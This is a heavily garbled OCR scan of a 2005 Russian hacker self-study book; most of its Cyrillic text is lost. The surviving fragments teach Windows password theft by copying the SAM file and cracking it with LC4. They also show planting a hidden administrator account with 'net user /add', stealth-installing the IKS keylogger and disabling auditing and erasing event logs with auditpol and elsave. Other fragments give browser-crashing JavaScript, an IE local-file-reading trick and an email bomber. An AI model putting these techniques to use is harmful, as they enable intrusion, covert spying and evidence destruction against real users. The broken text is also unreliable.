Upload
radu
View
141
Download
16
Embed Size (px)
DESCRIPTION
Самоучитель хакера. Подробное
Citation preview
Alex Atsctoy
004.056.53(075.8) 32.973.202-0878-1+32.973.2-018.278-1
Alex Atsctoy. : . . .: [, ] / Alex Atsctoy. .: , 2005. 192 .: . ISBN 5-93673-036-0. CIP
? , , - .
- : www.3st.ru E-mail: [email protected]
ISBN 5-93673-036-0
, 2005 , 2005 , 2005
1. 8
2. Windows ZOOO/Xf. . " 4. 5. fyay^epofc Web 6. 7. XaKUHflCQ
25 37 57 73 8399
8. Web~caumo&9. AmaKU'PoS
115143
. Windows 2000/Xf 11. 160 176 191
1. .............................................................................................. 8 ............................................... . .................................................. 9 - ? ................................................................................................... 10 ............................................................................................... 13 ................................................................................................ 16 ....................................................................................................... 16 ................................................................................. 17 ............................................................................. 75 Web ........................................................................................................... 19 Web ............................................................................................................ 20 ................................................................................................................ 21 ............................................................................................. 21 ................................................................ 22 - ....................................................................................................... 22 ................................................................................................................. 23 ................................................................................................................. 23
2. 231 WmdOMS 2OOO/XP. .............................................. 25 ........................................................................................................ 25 ............................................................................................................... 26 ........................................................................................................................... 27 Windows 2000/XP ................................................................... 28 SAM .............................................................................................................................. 29 ............................................................................................... 30 .............................................................................................................. 31 Windows 2000 ................................................................................ 33 ................................................................................................................. 35 ................................................................................................................. 36
.&.................................................? ................................................................................. 38 NTFSDOS Pro ...................................................................................................... 39 SAM .................................................................................................................. 44 .................................................................................... 47 ******** ............................................................................................. 50 ......................................................................................... 51 ............................................................................................. 52 ......................................................................................................... 53 ....................................................................................................... 53 ................................................................................................ .. 56
4. -
5758 59 63 66 68 69 70 72
5. & Web HTML Web-
7374 78 81 82
6.
8383 85 88 89 90 91 96 97
7. ICQ ICQ IP- ICQ- ICQ- ICQ ICQ-
99100 101 102 103 104 106 111 112 113
8. We|?~C3UmO& Web- Web- Web- IIS 5 Web- Teleport Pro HTML Web
115115 116 118 119 120 122 123 125 131 132 136 138 139 142
9. Ahl3KU " DoS !8 Smurf. Nuke Teardrop Ping of Death Land DoS
143144 145 145 147 148 149 151 752 154 154 755 155 756 159
10. Windows 2/. TCP/IP . 6
160 162 762 165 765
NetBus 168 169 173 175
. PhoneSweep 4.4 PhoneSweep 4.4 PhoneSweep
176177 178 179 180 782 185 186 186 190
1.
, - , , , , . , , . , ( ). !!! , , .. , , 2 () . . , : log: : 1: 2: em: e-mail . , ! . 13.06.1999, .. . !!! , http://www.super-internet-provider.ru , . , - , , , , , , , . , , , Web- .
- , . - , . , , , , , . - , , . - , , , . , , ! , , , . , , . - , 80- , , , , - , . .
, , , , . , , , . ( !), . - (-, !) , , . , , -
9
, . , , , , , , . , , , , , , - . , . , . , , , , , , , . , , , . , - , , , , . 20- - .
? , , , , , , - , - , , (, - ) , -
10
. , - , . , , . ( ). , : (, . ). , , , . Hard DISK [ Fdisk.exe] n- ( , ) . ! , , ! [ 24% ] , POWER - ! IDE- . , . , , , - , , , - , HARD DISK - , - , - , . , Must die, . Windows, , . , , . , Windows ? , , - ? , , , , .
11
, ? 21 ( ). : : , , , , , . , . : , . . , , , . : . . , . . , , . . : , . , ? - , , ? , ? , - . , , , , , ... . , , , (, , ) . , :12
- , 16 19 . ( 80%) , nerd. : 1) , ; 2) . (, ? - ). Windows Unix, TCP/IP , , C++, Perl, Basic. , . - , - 19- . , , , , . , , , . , , -, , . , , , . - , , , . , . , , - , - . . , , , . , . , , .
, , .. , . , , . , -
13
, , , . , , , , . , , : - .
, . , , , , , , [3]. , , , . , .
" , , , , . - - , . - , , , . , , , .
14
, , , , . , . , - , . , , , . , , (.. , ). , , , , , , . , , , , ( rootkit - ). - UNIX, Windows 2000 , 4, , , , , Windows, , . . IP-, . - . , - , , -, - , . , 4 - , , .
15
- , - . - , , . , DoS , IDS. . , .
, - , , . , , . , . ; , . - , , , , , . , , , . , [3] , . , , [3] ! [1]. , ( ). ,
16
, , - . , , , , , . , . , - , , . , . , , , . - .
. Web- (, RIPE NCC http://www.ripe.net). Web-, Whols, , , . , , , Web-. Yahoo (http://www.yahoo.com), Rambler (http://www.rambler.ru). . , , , , . , , , [3]. Google (http://www.google.com), . , , C:\WINNT, W i n dows NT/2000. - , .
17
, , Teleport Pro. , Web- , . , , HTML Web- - , , HTTP . , , , , , , , , ( 1 1 ). , Web- - , , . , .
, , , . . -, , , , .. , , . - SAM (Security Account Manager - ), . SAM - , 3 , , LOphtCrack LC4 (http://www.atstake.com). -, , , , Windows , MS Office . , . , 3 . Office Password 3.5 (http://lastbit.com/download.asp) Windows - , , . Revelation SnadBoy (http://www.snadboy.com). , 18
***** - , , - Revelation . , , , , , , . . - ? , , - , - .
Welo - . , Web-, , -. , Web, Web-, Web- , . Web- 5 . , . , Web-, . . , , 6 Death & Destruction Email Bomber - . , . , , , 6 Brutus.19
, , ICQ. - IP- ICQ- ( flood - ) ICQ- , ! - , 7 ICQ Flooder, ICQ-MultiVar, . - , IP- ICQ- ICQ, , . , .
WebWeb- , , , DoS, - . , IIS 5 (Internet Information Server - ) Microsoft . Web- , Web-, HTML . 8 , , CGIScan Brutus, IIS . 9 , DoS. Web- , , Web-. , DoS , - , . Web , , CGI-. , , .
20
TCP/IP , , , , IP-, , . , . 10 - SuperScan, foundstone_tools (http://www.foundstone.com). W2RK (Windows 2000 Resource Kit - Windows 2000), , W2HK (Windows 2000 Hacker Tools - Windows 2000). , , , .
flepex&am , , . , , - , . , . , , . - . , , , , . - SpyNet, .
21
, , VPN (Virtual Private Network - ) , , - . , , , , , .
, W2RK ( Windows 2000) W2HK - Windows 2000, . Windows (Explorer) Windows, . , , , password, . [3], , , , . , , , password.txt , ISP. , , . , NTFS Windows 2000/XP, , , PGP Desktop Security.
11~ - , , .. . Web- , (., , http://www.securitylab.ru). 8 IIS. CGIScan , . , 22
- , , IIS 4. Web , . - , , . . , ; , , - ( ). , , - -, , - .
- , . - , . 10 NetBUS, . , . - , , , . . - , , . , , - - , , ... , , .
- , , , , . , , ( ), , ? , , -
23
, , ? , - ? , , ( ), , , , - . , . . , , , , . , , . , , , , .... , , - Windows 2000/XP.
24
2.
Windows /Xf Windows 2000 TCSEC (Trusted Computer System Evaluation Criteria - ) . , Windows 2000, , . . . .
.
. , - , , , , , .. , - . , ( log in - ), - , . , , , , . Windows NT/2000/XP SAM (Security Account Manager - ). SAM , , . SAM - , 3 . , . , , , . , -
, , . , , , .., , , , . , , -, (, , ) , , , . , , , , . Windows NT 4 NTLM (NT LAN Manager - NT). NTLM Windows 2000/XP. NTLM, , LM (LAN Manager - ), , Windows NTLM. Windows 2000/XP Kerberos, , , . - Windows 2000/XP, - Windows 2000 Kerberos. - , Windows 2000/XP - . , , , , - .
, , , . - . Windows , , , . , , . , , , , , .
26
Windows 2000/XP , Windows NT/2000/XP . , . , , . , , . , (Guest), , - (User), . , , , . , (Administrators), , - , , ...
urn, , . , , - , .. , . , , . , , , , , . Windows NT/2000/XP, , , - . , 4, , , . , , , , ,
27
, , . , 11 , , . , , [2], [6], , - Windows 2000/XP, , .
Windows 2OOO/XP Windows 2000/XP SRM (Security Reference Monitor - ). SRM Windows 2000/XP, .. . Windows 2000/XP , , SRM. . LSA (Local Security Authority - ), , , LSA. , LSA . , LSA , . SAM (Security Account Manager - ), . , LSA. AD (Active Directory - ), AD . , LSA. , , : , , Kerberos; , . , , , : , , 28
Windows 2000/XP , /, . SAM AD , LSA . , , , .. , SRM. , , Windows 2000/XP. , . -, (SAM AD); -, . , .
SAM, , , , . , , , SAM AD, . SAM %%\5132\\5, AD - %KopHeBoft_KaTanor%\ntds\ntds.dit. , , , - ! . , , , , , Windows 2000/XP. SAM Windows NT 4 , NTLM , , , LM, Windows. LM , SAM , , LOphtCrack (http://www.atstacke.com) , . LOphtCrack SAM, , , pwdump (http://www.atstacke.com). Windows - pwdump SAM , LOphtCrack, - , LM - .29
Service Pack 3 Windows NT 4, , Syskey () , SAM. Windows NT 4 Syskey ; Windows 2000/XP Syskey . LM NTLM Syskey , . , - , 3-4 , . , 1 Microsoft, - Microsoft! Windows. , , .
Windows 2000/XP , , , , , ? . , , Windows, SID (Security IDentifier), 48- , . Windows 2000/XP SID, Windows 2000 SID. . , , ? (, ..) Windows ACL (Access Control List - ), (Access Control Entries - ). SID . ACL
30
Windows 2000/XP , , (Explorer) Windows, Windows 2000/XP. ACL. Windows 2000/XP (, ) LSA , SID 8 , . , , SRM 8 ACL , , . , , - . , , - , . , . - ACL , Windows 2000/XP . , (, http://www.rootkit.com). , ACL ! , - , ? , . , , Windows 2000/XP.
Windows NT 4 , .. , Windows 2000/XP ADS (Active Directory Services). ADS Windows 2000, Windows 2000 Server. , , . - , , , , - ADS , , .. . , , IP- .
31
ADS , , - , . OU (Organization Units), , , , , , , , OU. OU - , .. OU , OU . Windows 2000/XP , . , . Windows 2000 , - , Windows 2000 Windows NT. , , . Windows 2000/XP , . , , . , .. . , . , domen. : com*!.domen, comp2.domen... , , , , domenl, domen2,... , , . , domenl domen2 , domen2 domenl, domen2 comp1.domen2.domenl, comp2.domen2.domen1, ... compN.domen2.domen1. domenl domen2 , forest, . , domenl compl.domenl.forest, comp2.domen1.forest , domen2 compl.domen2.forest, comp2.domen2.forest, .... .
32
Windows 2000/XP , - , : . (Universal group), , , . (Global Group), , , . (Local group domain), , . ACL . - . , , AD, , , . - AD SAM, , SAM. AD , AD, , ( 10 ), AD , , , . , . , , , Window 2000, . , , LC4 LOpghtCrack . , , - - .
Windows 2000 Windows 2000 , . - , 332 - 5830
, -, , . -, , , [7], , . - , , - , . . - , - , AD. - - , - -. - , . . -, - . -, , - , , , , . , , , . . - , , , LM, - LM ( , , [3]). Microsoft NTLM ( Service Pack 3 Windows NT 4) NTLMv2 ( Service Pack 4 Windows NT 4). , , Windows 2000 Kerberos, - , . . , Windows 2000/XP Windows , LM. Windows 2000/XP Kerberos, NTLM LM.34
Windows 2000/XP - TCP- 88 , Kerberos, . - LM NTLM, LOphtCrack . , - , . , ?
, , , . , , . , . , , , . , . , , Windows 2000. , Microsoft , , . Windows XP Windows. Windows 2000/XP [7], . , , , . , , Retina, [7].
35
-, . -, , , VPN (Virtual Private Network - ). VPN , . VPN , . , , , , (Bruce Schneier), (Applied Cryptography), - . , - , , . - , .. .
Windows 2000/XP , . SAM, LSA, SRM, ADS, LM, NTLM, Kerberos . Windows, . Windows 2000/XP, / ADS , Microsoft Press Windows 2000.
36
3
& Window 2000/XP, , , , , ? , 2, , , , . . ( , - . .) - , . , , , ( - ...). , , . , , , , , , ( - ). ? , - , . - . , . , - , - . , . -, , - - , Windows. , , , , . , , ,
(. 1), - , . - , , , - -. -, , , Windows BIOS . , Windows 2000/XP .
, - (, ). , , - MS-DOS ! - , . -, BIOS , BIOS . . -, BIOS , NTFS, Windows 2000/XP. , MS-DOS - - , - . , -, , ( - - , ! , . , , ), Windows 2000/XP. - NTFSDOS Professional (http://www.winternals.com) Winternals Software LP, NTFS MS-DOS. , , Windows 2000/XP . - , . NTFSDOS Professional - .
38
1515 fro NTFSDOS Pro . Windows NTFSDOS Professional NTFSDOS Professional Boot Disk Wizard ( NTFSDOS Professional). , NTFS. . , FORMAT/S SYS MS-DOS. Windows XP Create an MS-DOS startup disk ( MS-DOS). > * NTFSDOS Professional (Start Programs NTFSDOS Professional). (. 3.1).
wizard will help you install V/indows NT/200DvXP system files needed NTFSDOS Professional to run from a MS-DOS diskette or hard disk
PMC. 3.1. NTFSDOS Pro > Next (). (. 3.2), , . > , Next (), . NTFSDOS Pro MS DOS ( 437). (. 3.3) .
39
NTFSDOS Professional Boot Disk Wizard copies drivers and system files from an existing Windows NT/20QP/xP installation or CD-ROM to your hard disk or a pair of floppy diskettes. If you wish to create bootable diskettes you must add MS-DOS to the diskettes yourself, either before or after using this program. Use the FORMAT/S or SYS commands from a MS-DOS shell to make bootable diskettes. You can also make a bootable diskette on Windows XP by opening My Computer, selecting the "Format" option from the context menu of your diskette drive, and formatting a diskette with the "Create an MS-DOS startup disk" option checked.
< Back
Next >
Cancel
J
. .2.
NTFSDOS Pro uses the character set tor Hie United States version of MS-DOS (aide page 437) by default Select any additional character sets you use with DOS. Japan, code page 932 Korean (Johab). code page 1361 Korean, code page 949 MS-DOS Canadian-French, code page 863 MS-DOS Icelandic, code page 661 MS-DOS Multilingual (Latin 1). code page 650 MS-DOS Nordic, code page 865 MS-DOS Portuguese, code page 86 MS-DOS Slavic (Latin II). code page 852
< Back
Next >
Cancel
-
. .. > Next (). NTFSDOS Pro (. 3.4). Windows NT/2000/XP, NTFSDOS Pro. , , C:\WINNT, \I386 Windows NT/2000/XP, - Service Pack. > Next (). NTFSDOS Pro (. 3.5).40
Pro uses copies of several files located in your Windows NT/200Q/XP m directory. Specify the name of your Windows NT/2Q.OOVXP installation directory, or a directory containing the required Windows NT/2000 system files. |c\ASFRool
Finish (), . NTFSDOS Pro, . NTFSDOS Pro . , , NTFSPRO.EXE, NTFS . , , MS-DOS , FAT FAT32, NTFSDOS Pro . MS-DOS NTFS, Windows 2000/XP . , ( - ), , , . , - , , , . , , , . - SAM, , , _/132/1'|.
43
5 SAM, SAM. NTFSDOS Pro, MS-DOS SAM /KOpeHb_CMCTeMbi/system32/config . - , , LC4 - LOphtCrack (http://www.atstake.com). . 3.9 LC4 Import ().
IB?!
Import | Senion
Help
Import From Local Machine Import From Remote Registiy.. Import From SAM File... Import From Sniffer... Import From .LC File... Import From .LCS (LC3) File Import Frum PWDUMP File...
I File * New Session ( * ). , . 3.9. > Import Import From SAM File ( * SAM). SAM. > SAM, 1-3. > (. 3.10) Session Begin Audit ( ) .44
?l@stakeLC4 -(Unlilbdll File View Import Sestion Help
.i u_u empty ' empty ' empty ' empty ' amply " empty '
* \ ft \ ' empty '
IALEX- (ALEX-lALEX-3 lALEX-3 lALEX-3 [ALEX-3
lALEX-3
Administrator ASPNET Guett HelpAssittant IUSH_ALEX-3 IWAM_ALEX-3 NewUzer
Od Oh Qm us
e.;
i asCS
mporled 7 accounts
Puc. 3.10. SAM , , SAM, . , . 3.11, SAM.
Adnuniitialoi ASPNET Guel HelpAti.tlonl IUSH.ALEX-3 IWAM.ALEX-3 NenUter
. 3.11. SAM ! , - 007 , , . , , 5 Pentium 2 400 . 45
- , LC4 . LC4 Auditing Options For This Session ( ), . 3.12.Dictionary Crack D Enabled Dictionary List [
The Dictionary Deck tests For passwords that are the same as the words listed in the word file. This test is very fast and finds the weakest passwords. Dictionary/Brute Hybrid Crack El Enabled |0 3 Characters to prepend I Characters to append
Common letter substitutions (much slower) The Dictionary/Brute Hybrid Crack tests for passwords that are variations of the words in the word file. It finds passwords such as "Dana99" or "monkeys!". This test is fast and finds weak passwords. Brute Force CrackEl Enabled D Distributed Character Set |A-ZandO-9 Custom Claraclw Set ch ch*:ttrt
Ptrtli.
I Oil
J
The Brute Force Crack tests fa passwords that are made up of the characters specified in the Character Set. It finds passwords such as "WeR3pll6s" a "vC569t12b". This lest is slow and finds medium to strong passwords. Specify a character set with more characters to crack stronger passwords.
OK
Cancel
Puc. 3.12. , LC4 : Dictionary Crack ( ), Dictionary List ( ), . LC4 , , . , , , , , .., . Dictionary/Brute Hybrid Crack (/ ), , / , , . Password???, .
46
Brute Force Crack ( ), . , . Character Set ( ) , Custom (), Custom Character Set (List each character) ( ( )) . Distributed () . File Save Distributed ( ) . LC4 Windows NT/2000/XP. Windows, Windows 95/98, Pwltool.
' Windows , , . MS Office (http://www.elcomsoft.com), - OfficePassword 3.5. , , ******* Revelation SnadBoy (http://www.snadboy.com). , , AZPR , Passware Kit, http://www.lostpassword.com. Windows - , /, , , Window - OfficePassword .
47
OfficePassword 3.5 OfficePassword 3.5 Lotus Organizer, MS Project, MS Backup, Symantec Act, Schedule+, MS Money, Quicken, MS Office - Excel, Word, Access, Outlook, ZIP VBA, MS Office. OfficePassword 3.5 . Word password.doc, - ? , Windows, password.doc, (. 3.13). - , OfficePassword 3.5 : > OfficePassword (Start Programs * OfficePassword). OfficePassword (. . 3.14).Password Enter password to open file : \test\password . doc
II[ OKCancel
1
Puc. 3.13. WordI OfficePassword "DEMO" File Took Option* Help
1-]
Selecl documentYou can also diag-and-drop files from Internet Explorer onto this window. > (c) 1998-2001 Vitas Ramanchauskas. LastBit Software Select document ( ) Windows MS Office. , Word . , MS Word . , - OfficePassword 3- .48
- , . > , Select recovery mode ( ), . 3.15.Select lecoverv mode Jocument path: C:\test\passwotddoc (Word) Version : Wotd 8.0+ ntemal version: 133 Word language : Russian (0419) incryption type: Strong Text size : 537 Preview Automatic OflicePassword automatically selects most suitable recovery options. Recovery may take a lot of time (up to several months in case ol a long password]. About 80% of all passwords could be recovered within 48 hours. Use guaranteed recovery otherwise. User-defined Adjust settings to optimize search for specific case. (This option is for advanced useis only.) Guaranteed recovery Success is guaranteed! Important: please read the documentation. Additional fee may apply. I Click here to learn
Cancel
| Display help info
Next
Puc. 3.15, > Select recovery mode ( ) : Automatic ( ), , Next (), , . User-defined ( ), . . Guaranteed recovery ( ), , , , . > NextlOlficePasswoid 'DEMO* Password found: '007' (without quotes) The password has been copied onto the clipboard Would you like to open the document now?
L
Yes
No
Puc. 3.16. !49
(). , , (. 3.16). OfficePassword 3.5 , , . - , . , - , . , , 24-28 , . , , . , , - , .
******, - , , (, ), , ******. , , , . - , , , . , . , -, . , , NetBus . . 3.17 Revelation Snad (http://www.snadboy.com) NetBus NetBus.
50
* SnadBoy's Revelation 'Circled V Cursor Drag to reveal password | Check For Update) | About
Exit I Copy to clipboard
Text ol Window Under 'Circled V Cursor (il available)
007Status Revelation active. Length of available text: 3
Reposition Revelation out of the way when dragging 'circled V When minimized, put in System Tray
Always on top Hide 'How to' instructions
i SWORD-2000 iMycq Change Hoct "Host information-
^
How to 1) Left click and drag (while holding down the left mouse button) the 'circled V
2) As you drag the 'circled +' cursor over different fields on various windows, the text in the field under the cursor will be displayed in the Text of Window...' box. 3) Release the left mouse button when you have revealed the text you desire. NOTE - II the field contains text hidden by asterisks (or some other character), the actual text will be shown. In some cases the text may actually be asterisks. NOTE - Not an of the fields that the cursor passes over will have text that can be revealed. Check the status light foi availability of text. Bright green - text available (See length of text:' in Status area) Blight red - no text available
Destination: |SWORD-200 Host name/IP: 1.0-0-1 TCP-port: User name: |Administrator Password:
Cancel
Puc. 3.17. NetBus Sword-2000 ! Revelation . 'Circled+'Cursor ('+') SnadBoy's Revelation ( . 3.17 Password ()). Revelation, Test of Window Under Circles and Cursor (if available) ( ( )) ( ). . 3.17, 007 NetBus Sword-2000, ( ). ( NetBus) [11].
- , - , - , , - . : .51
, 4. - , , , . , , , . - , backdoor - , , .
&* , , , , . MS-DOS: NET USER /ADD, , NET LOCALGROUP /ADD, . . 3.18 .r^JCommand Prompt
- NewUser 00 /add |The command completed successfully. C:\>net localgroup fldministrators NewUspr /add I The command completed successfully.
Puc. 3.18. NewUser NewUser , , . , , .
52
- , . Windows - Startup Document and Settings ( ) , . Startup, All users, . , , . , (), . IKS (Invisible KeyLogger Stealth - ), - http://www.amecisco.com.
- , . - , , . IKS - http://www.amecisco.com, Invisible KeyLogger 97 8 10 , . Windows NT/2000/XP, , , 1^' l+ir^n+l0"8"]. IKS Windows NT/2000/XP. , IKS , . IKS . Web- iks2k20d.exe , . 3.19.
53
D Standard Install | p Stealth Install | D Uninslall |
It's recommended that you use Standard Install if this is your first time in using IKS. Just accept the defaults and dick on "Install Now" button. Or you can dick on 'Read readme M" to get familiar with the concept of IKS first. During a standard installation a program directory will be created; program files will be placed in the directory. An icon to the log file viewer will be placed on the desktop. No Tile renaming (stealth features) will take place. Install Directory |C \Progrem Files\iks You need to heva administrator rights on this system for it to install successfully.
rf you want to uninstall in the future, just run this program (iksinstall.exe) again, dick on the "Unmstall" tab, then "Uninstall Now" to automatically uninstall the standard installation.
Read readme.M
. 3.19. IKS Install Now ( ) - . IKS . , IKS , iks.sys, . , dataview.exe, . 3.20.Settings Help
0 Filter Out Arrow Keys D Filter Out Ctrl and Alt Keys Rtter Out F1 to FT 2 Keys Filter Out All Other Function Keys Import Binary Log From:
Use Notepad Translate to Text Only Gear La a Clear Binary Log Upon Exit 0 dear Text Log Upon Exit
Save Text Log To: C:\DOCUME~1\ADMINI~1.000\LOCALS I Browse,
Puc. 3.20.
54
Go! () , . . 3.20 , , . , IKS , . iks.sys KOpeHb_CHCTeMbi/system32/drivers, ( Regedt32 . 3.21).Registry Editor [HKEY LOCAL MACHINE on Locnl Mnchi Registry Edit Tree View Security Options Window SGemuwa SGpc &I37DRIVER CEJIAS ICQ Groupware COIISADMIN IPMksl CD ILDAP QIMAP4D32 GDIMonitor inetaccs Cllnetln(o Inport Help
Start: REG_DWORD: 0x3 Type: REG_DWORD: 0x1
Puc. 3.21. Windows (, The Cleaner, ). IKS, Stealth Install ( ) (. 3.19) - , calc.sys, (, - - ). IKS . 007 Stealth Monitor, Web-, , , . - Windows, - , , notepad.exe.
55
, BIOS, . , . , , . , - , , , , ( ), , , . - , , . Windows 2000/XP . Windows 9x/Me, - , PGP Desktop Security, . Windows 9x/Me , . , , , , - ? . .
56
4.
- , , , . , , , , , - , , , . , , - , , , . , - . 1 , 50% , - , , . , , , . , ,- , , . , ( ). , - ( ). , . , - , , , . .
, , , . , , , - . , privacy - . , , , , , , , . , [10], (, ) , - , - privacy. , , , , , , - , . . , , , , , . , . . -, . , , . , , , - , . -, . . , Web- , Web, . , , ,
58
(, ).
, , - , , - . , ? , , . : , . , Web-. , - . , . Windows, (Explorer) , . , Windows. , MS Office. , , , . ? , .
. , , (Explorer) , . , (Delete) Windows , , . Windows , , , , , MS Office. , , (Show hidden files and folders) 59
(Folder Options) Windows. * (Tools * Folder Options) (. 4.1).)0 j
| | j
I
(
. | | |
: " " ; D 0 0 () Q Q - , / " 004.tmp |~WRL1120.tmp ~WRL19B2.tmp |~WRL3531.tmp
| |
Puc. 4.2. , , - ., .WBK, 60
, ~$. , , , Windows, , , Windows. , - , , . ? , MS Office, , , , Norton Utilities. - Cleaner Disk Security (http://www.theabsolute.net/sware/index.htmlttClndisk).
, , , . , . , , . - , , . ( 100%) . . 4.3 Clean Disk Security 5.01 (http://www.the-absolute.net/sware/ index.html#Clndisk), , ( ). Clean Disk Security 5.01 Erase fully ( ). , , - . 4.3. Clean Disk Security 5.01 ( 61
FAT NTFS). , , . Windows, Windows, Temp ( , , ) . -, , , (cookie). , (. 4.3). . 4.3, : Simple () - 6 , . ; 1 . NIS - 7 (.. ) . Gutmann - 35 (.. ). (Peter Gutmann) . . , ( ). Test mode ( ) - #10 ASCII. . , Clean Disk Security 5.01 , , . , [10]. - , : (UPS); . , , . , .
62
, , . , , . -, , , . , . , , , Norton Utilities, , / , . , , [10]. ( ) - , , regedt32. . , , NTFS.
, , , - . , - - Web- . , , . . , , .
& , , . . , .
63
, . (). , , , . ( Web-, , , ), , , , . , , . (., [5], [10], - , , ). , -, . , , , . , -. -, , . . , . , , , . -, - , ! - , , , . , , !!!
Web- , 64
. HTML- Web-. Web- , , Web-, . , , Web- http://www.privacy.net/analyze, , Web- . . 4.4, , Web-, - .3l Analyze Your Internet Privacy - Microsoft Internet Explorer ^ ^ " ^ ^ ^ ^ ~ ^ ^
BBSBBBgg
**- ^
Your Browser Type and Operating System: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0; MSIECrawler) All Information sent by your web browser when requesting this web page: Accept: */* Accept-Language: ru Connection; keep-alive Host: www.privacy.net UserAgent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0; MSIECrawler) Cookie: Date=1/30/2002; Privacy. net=Privacy+Analysis Via: 1.1 cea15. 1.1 proxy.iptelecom.net.ua:3128 (Squid/2.4.STABLE3) X-Forwarded-For: 212.9.232.151, 212.9.224.89 Cache-Control: max-age=259200
a_
. 4.4. Web- , ( ) Whols, 1, . , - , IP- . Web- Web- , IP- - ...
653 - 5830
, , Web-, ( anonymizer - ). , Web-, , . , , http://www.anonymizer.com. (. 4.5).Anonymizer.com -- Onlinu Privacy Sorvic 4- - - 1 | U [ ife-r ^ " hup.//wwwanonymteBf.coin.
Anonymizer.com(| AboutPrivacy'
FIND IT STO
S
spyCap " '"
:
. 4.5. Web- Go. - , - FTP-, , , . , , , Web-, , . ( ), .
Web -, - (Proxy server) (. 4.6).
66
- '" . , D Q 0 - : |www.anonymize| ; J8080 [...!
D - - : : :
1 1 1
|
. 4.6. - - , , , .. Web- -, . - . - HTTP, FTP-, Web-, FTP. - , . - . - . , , , Web-, , Yahoo. proxy+server+configuration+Explorer, Web-, , -. - , , .
67
, , , , , , , . , , , 3 IKS. , , NetBus (http://www.netBus.org). , , , , , . : - , ( - ). IP- , -, . , , . , Back Orifice 2000 31337 , , 31336, , , . , Windows NT/2000/XP. , auditpol W2RK, - , , elsave.exe (http://www.ibt.ku.dk/jesper/ELSave/default.htm). (Event Viewer) Windows 2000/XP. , , (Hidden). Windows, . , . , 68
, , explorer.exe, Windows Windows. , EliteWrap, [11]. ( Rootkit - ). , , . . Tripwire (http://www.tripwiresecurity.com), , Cisco Systems (http://www.cisco.com) . Windows 2000/XP , , , [7].
, , , - , . , / . Windows NT/2000/XP, , auditpol.exe W2RK. ( ) , . :
C:\Auditpol>auditpol \\ComputerName /disable Running... Audit information changed successfully on \\ComputerName ... New audit policy on \\ComputerName ... (0) Audit Disabled
69
System Logon Object Access Privilege Use Process Tracking Policy Change Account Management Directory Service Access Account Logon
= No = No = No = No = Success and Failure = No = No = No = No
//ComputerName - , /disable . auditpol.exe - , , , , ( auditpol /? ).
Windows 2000/XP : > (Start) (Settings Control Panel).File Action View Help
Event Viewer [Local] I Type I Description Application Error Record! I Sire 512...
Delete all records n the log
Puc. 4.7. Windows70
(Control Panel) (Administrative Tools). (Event Viewer). Event Viewer ( ) (. 4.7). (Security Log); . Clear all Events ( ). , . 4.8, .
Do you want lo save "Security" before clearing it? Yet No Cancel
Puc. 4.8. > (No), . . , - ! , - . , elsave.exe (http://www.ibt.ku.dk/jesper/ELSave/default.htm). , , Windows NT 4, Windows 2000. . C:\els004>elsave -s \\ComputerName - -s , - . , . elsave /? , . , elsave.exe . - elsave.exe Windows ( (Start), AT MS-DOS). System, .71
- ( , - ). , , . , , , , . - ! 50% ( - !) - ! - , , [9]. , , Norton Personal Firewall, PGP Desktop Security . , , , .
72
5
# , , , , . , , , , , . , 90- , . , , . , , , . , , , TCP/IP. - , . - , , . , . , , , (, ). , . , , , , Word .., , , , . WWW (World Wide Web - ), Web (). Web - , Web . - 1961 , Web 1992 . , , -
. Web - Web , , Web. Web . Web, Web URL (Uniform Resource Locator - ), Web. , Web HTTP (Hyper Text Transfer Protocol - ). , Web, HTML (Hyper Text Markup Language - ). , , , - HTML CGI HTTP. Web , , Web, , - , , - 1 Web . Web , , Web - HTML Web, ( browser, , , ), Web Web-.
HTML - Web, Web, , , , , , , , , . , HTML , Web, , Internet Explorer (ffi) Netscape Navigator (NN).74
Web : Web - , HTML Web , , , HTML, , - Web? - HTML? . ( ) , , Web-.
, DoS , Web . , , Web, , . open ( ) , JavaScript MainPage.html , HTML 8. 1. 8.1. HTML Web- < SCRIPT LANGUAGE* " JavaScript " > generation () ; function generation () { var d=0; while (true) { a = new Date; d = a.getMilliseconds( ) ; window. open ("MainPage. html", d, "width=250, height =250") ;
HTML, , . Windows 2000/XP IE 5 IE 6 HTML, .
75
IE 5 IE 6 .
tlep - . , 8.2 ... ( ). 8.2. HTML Web- var p = external.... ; HTML 8.2 IE 5 6 var p 8.2. ( [3], [10]). , , - HTML .
[3] HTML, CLSID. 8.3. HTML, . 8.3. HTML 8.3 IE 6 , . 5.1.
76
WebJQ C:\Documenl. and Selling*\Alex4Mj> DocuroenUSWork D... [)11
. 5.1. HTML C:\Windows\ system32\calc.exe, , .
Web- , JavaScript, HTML- Web-, . , IFRAME, Web- . 8.4 HTML, , C:\security.txt. 8.4.
Web- _
C:\security.txt
alert (" : \n " +b . document . body . innerText ) ; 77
II.navigate("file://:/Security.txt"); setTimeout('Il.navigate(nfile://C:/Security.txt")',1000); 8.4 IE 5 IE 6 , . 5.2.
File
Edit
View
Favorite*
Tools
Help
QMd.-0-
. 5.2, security.txt - - Web-. , , , JavaScript . 5.2. Web- . Web- NavigateComplete2, [3].
C:\security.txt
Web-caumo& Web, , , - Web- . , Web- ActiveX, . , , , , , , -, - .. - , , . , - .78
Web - , - Web-, . , , . , Web - . , Windows Web- Microsoft NetBus. Web-, . Web , . 8.7 HTML, -. 8.7. HTML Bubliki&Baranki !!!!! - (Address) , , , , . IE Address Javascript. URL HTML IE 6, ; , IE 6 HTML . ! , , Web- - . , , , .
, , , , Web . . , , , Web. , Web- . . -, , ,
81
, . . , , . - Web-, - , . : . , , SSL. Web- . . , , , . . , . , , , , . .
Web - . , . , , , , Web . , - Web , , - , , . , , 4 IE Netscape, , 5 6 . , , .82
6.
, , , , , . , . , , . , , , , , ... , - !
- (, , , 1, ). , , , ! , . ? - - - . ( Flood - , ) ( Spam - , . Spam ). (.. ), , , . , -
SMTP-. Death & Destruction Email Bomber ( & ) 4.0, DnD (http://www.softseek.com/Utilities/VBRUN_Files/). , . , DnD, . Avalanche - Avalanche DnD, . . 6.1 DnD 4.O.Death and Desliuclion 4.0 File Clones Header Session Random Lists Mailing Lilts Window Extras Help
-Email Bombing is rarely damaging to the target but is always damaging to smtp hosts. I do NOT condone mailbombing as it causes problems for SysAdmins of servers. I did not make this program for people to blast away at each other. PLEASE use it responsibly, and if you HAVE to email bomb, then please use the option to randomly switch servers in between messages; as it lightens the loads on the server. Have fun and don't ruin a good sysadmins time by flooding his server!
Send bomb to: Say bomb is from: I Message Subject: I
_pj
CC:
| | 0 Randomly Change | EdilL 7 ] 0 Randomly Change | Edit List
